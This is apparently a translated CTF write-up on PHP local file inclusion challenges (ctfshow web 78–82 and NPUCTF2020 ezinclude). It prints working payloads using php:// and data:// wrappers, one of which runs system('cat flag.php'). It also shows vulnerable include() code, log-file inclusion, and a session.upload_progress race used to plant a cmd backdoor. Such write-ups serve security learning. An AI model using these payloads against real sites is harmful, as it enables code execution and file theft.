- Review the file contains vulnerabilities today
web 78
payload:
?file=php://filter/convert.base64-encode/resource=flag.php
web 79
payload:
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
web 80-81
- This question has skills from the beginning
- The source code filters the php and data pseudo-protocols can not be used
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
- payload
?file=/var/log/nginx/access.log
- File contains log files
web 82
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
- Filtered. Then the method used in the above question will not work
- I don’t know how to read WP for this question
- Here is the file inclusion for the learning material session.upload_progress
Entrained private activities [NPUCTF2020]ezinclude
- I gave a hint when I entered the page
<!--md5($secret.$name)===$pass -->
- After the packet is captured, the hash value is directly url uploaded
- And then gave a hint
include($_GET["file"]
- Try to read the source code
\flflflflag.php?file=php://filter/convert.base64-encode/resource%3dflflflflag.php
<html>
<head>
<script language="javascript" type="text/javascript">
window.location.href="404.html";
</script>
<title>this_is_not_fl4g_and_出题人_wants_girlfriend</title>
</head>
<>
<body>
<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>
</body>
</html>
- Filtering these things directly pseudo-protocol is not working, thinking of two methods, one is the log file (do not know the path) and the other is
session.upload_progress for file inclusion - My solution to this question is session.upload_progress to include files and then use competitive attacks
- POC
- Access to staged files
- Competitive attack
- Write a backdoor
- POST parameter: cmd=phpinfo();
- The flag is in phpinfo(), I searched through the catalog files and finally looked at wp to know that it is in phpinfo()